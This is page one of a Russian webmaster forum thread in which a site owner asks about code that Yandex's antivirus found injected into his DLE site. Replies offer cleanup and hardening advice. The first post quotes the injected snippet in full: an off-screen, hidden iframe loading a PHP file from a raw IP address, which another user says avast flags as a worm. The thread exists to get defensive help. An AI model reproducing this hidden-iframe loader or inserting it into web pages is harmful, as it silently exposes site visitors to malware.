Вирус или что на сайте

(Ответов: 16, Просмотров: 960)
Страница 1 из 2 12 Последняя
  1. Студент
    • Регистрация: 29.12.2012
    • Сообщений: 46
    • Репутация: 0
    При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

    <style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style> <div class="hp60pdz1o"><iframe src="http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe>
    Это что такое?Все проги показывают,что вирусов нет.Страницу проверяли ничего нет...
    • 0
  2. You shall not pass. Ага. Аватар для Гендальф Серый
    • Регистрация: 02.02.2013
    • Сообщений: 1,184
    • Репутация: 1512
    • Webmoney BL: ?
    Стесняюсь спросить, а это что
    Цитата Сообщение от andys1 Посмотреть сообщение
    http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php
    ?

    аваст ругается на ссылку, говоря что это червяк. Совсем вы невнимательны, уважаемый. Плохо проверяете.

    Очень интересно, какие именно "проги" показывают отсутсвие вирусов, что даже мой дряхлый avast-free нашёл в себе силы выдавить сообщение об опасности?
    Последний раз редактировалось Гендальф Серый; 09.02.2013 в 15:27. Причина: проверил авастом
    • 0
  3. Web-разработка Аватар для semyon
    • Регистрация: 20.06.2011
    • Сообщений: 1,781
    • Репутация: 549
    • Webmoney BL: ?
    andys1, Вам дали файл. Проверьте его, за что отвечает. Что делает.
    А так вот по буковкам, мало чего скажешь.
    • 0
  4. Опытный
    • Регистрация: 08.06.2011
    • Сообщений: 479
    • Репутация: 28
    • Webmoney BL: ?
    Странно... А мне почему-то Яндекс не указывает никогда, где именно вирус, всегда пишет просто поведенческие факторы, и все...
    • 0
  5. Студент
    • Регистрация: 29.12.2012
    • Сообщений: 46
    • Репутация: 0
    Генальф Серый,Как найти ее и удалить ? Подскажите
    • 0
  6. You shall not pass. Ага. Аватар для Гендальф Серый
    • Регистрация: 02.02.2013
    • Сообщений: 1,184
    • Репутация: 1512
    • Webmoney BL: ?
    andys1, а бог ты мой. Кто ж вас в интернет вообще пустил? У вас чёрными латинскими буквами написано где она висит! Это раз.
    Чтобы такого больше не повторялось - советую:
    а) Проверить .htaccess на наличие чужого кода
    б) Поменять пароли на БД и ФТП и пользоваться более безопасным софтом для обмена данных с сервером.
    Это два.
    • -1
  7. Студент
    • Регистрация: 29.12.2012
    • Сообщений: 46
    • Репутация: 0
    Гендальф Серый,Все ,я смотрю,умные только языком трепать..До сих пор ничего не помогло,все пересмотрели..
    Сайт на ДЛЕ.

    Началось примерно месяц назад.Яндекс прислал письмо о вред.коде на сайте.

    Все пересмотрели,что-то удалили, заменили jquaery,через пару дней Яндекс написал,что все ОК,кода нет...

    Через 2 дня--опять,что вред.код! В супре я посмотрел все сайты на этом хостинге--через одного --вредоносный код. Я написал хостеру--он мне прислал отчет-проверка сервера-все ок!

    Через пару дней опять--вредоносный код на сайте! Потом через 2 часа!!!---Яндекс пишет,что все ок,вредоносного кода нет, а выглядел он так-то и так-то..Но никаких ,естественно работ на сайте мы не производили.....Ничего не делали....



    Так меня это уже все достало,эти качели...вот уже Яндекс раз 10-тый присылает ,то есть код,то нету. Может кто поможет разобраться
    • -1
  8. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?
    andys1, Согласен помочь, не бесплатно, если будет над чем поработать. Одно условие, требуется SSH доступ к хостингу.
    Сpanel хостинг и ISPmanager хостинг от 119р./мес
    VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
    • 0
  9. Студент
    • Регистрация: 29.12.2012
    • Сообщений: 46
    • Репутация: 0
    izyalex,А удаленно подсказать не бесплатно,конечно,можно?
    • 0
  10. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?
    andys1,
    1. Удалите вредоносный код.
    2. Найдите и удалите все веб-шеллы.
    3. Закройте от посторонних глаз админки CMS.
    4. Обновите все CMS и все ее плагины до последней версии.
    5. Установите все рекомендации разработчиков CMS по безопасности, от .htaccess файлов в папках с картинками до нужных прав на папки и файлы.
    ... можно по ситуации(наблюдение за access логами) еще что-то добавить
    Сpanel хостинг и ISPmanager хостинг от 119р./мес
    VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
    • 0
Страница 1 из 2 12 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Вирус на сайте?
Вопросы от новичков 19 24.09.2012 16:01
Вирус на сайте.
WordPress 2 07.04.2012 20:23
Вирус на сайте.
Web программирование 1 03.04.2012 12:25
Вирус на сайте
Софт, скрипты, сервисы 27 15.02.2010 21:41

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры